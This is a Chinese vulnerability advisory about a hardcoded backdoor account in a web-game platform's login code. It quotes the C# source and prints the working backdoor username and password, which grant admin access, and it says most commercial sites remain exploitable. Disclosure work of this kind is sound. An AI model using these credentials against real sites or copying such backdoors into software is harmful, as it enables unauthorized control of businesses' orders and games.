信游科技页游平台程序通用型代码级后门账户(成功登录多个商业后台并可操纵订单和游戏)

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 代码级的后门账户。做网页游戏收入还可以啊…… ### 详细说明: 可能为测试用代码,未去掉,大部分商业用户的站点现在还可利用。而且如果是直接使用免费版的肯定是还没有改的。 ### 漏洞证明: 先看Api/sys/login.ashx这个文件: ``` context.Response.ContentType = "text/plain"; var _form_ = context.Request.Form; var uid = _form_["uid"]; var pwd = _form_["pwd"]; var rem = _form_["rem"]; if (uid=="") { context.Response.Write("请输入用户名"); return; } if (pwd == "") { context.Response.Write("请输入密码"); return; } DataManage.UserEng ueng = new DataManage.UserEng(); var t = ueng.Login(uid, pwd, rem.ToLower() == "true"); //UserEng类的Login方法就是用来登录的 ``` 再跟进到UserEng.Login ``` public UserLogin Login(string uid, string upwd, bool rem) { UserLogin result; if (uid == "apwmaster_D7" && upwd == "apwmaster_d7") //后门账户的用户名、密码!!! { IList<Apw_User> all = this.dataserver.GetAll<Apw_User>(EngSql.Ene("userlogin", "'" + uid + "'")); if (all.Count < 1) { IList<Apw_User> all2 = this.dataserver.GetAll<Apw_User>("select * from Apw_User where u_GroupID in (select ID from SU_Group where gp_Key like '%sys_security%'...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息